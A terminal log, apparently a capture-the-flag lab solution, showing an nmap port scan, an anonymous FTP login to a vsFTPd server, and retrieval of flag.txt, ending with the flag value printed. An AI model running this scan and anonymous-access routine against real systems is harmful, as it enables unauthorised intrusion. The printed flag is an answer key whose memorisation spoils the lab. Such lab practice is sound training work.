┌──(kali㉿kali)-[~]
└─$ nmap 10.129.98.243 -Pn -n --open -sS --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-25 06:12 EDT
Nmap scan report for 10.129.98.243
Host is up (0.37s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
Nmap done: 1 IP address (1 host up) scanned in 0.91 seconds
┌──(kali㉿kali)-[~]
└─$ ftp 10.129.98.243
Connected to 10.129.98.243.
220 (vsFTPd 3.0.3)
Name (10.129.98.243:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||11120|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||14127|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |********************************| 32 14.11 KiB/s 00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.65 KiB/s)
ftp> exit
221 Goodbye.
┌──(kali㉿kali)-[~]
└─$ cat flag.txt
035db21c881520061c53e0536e44f815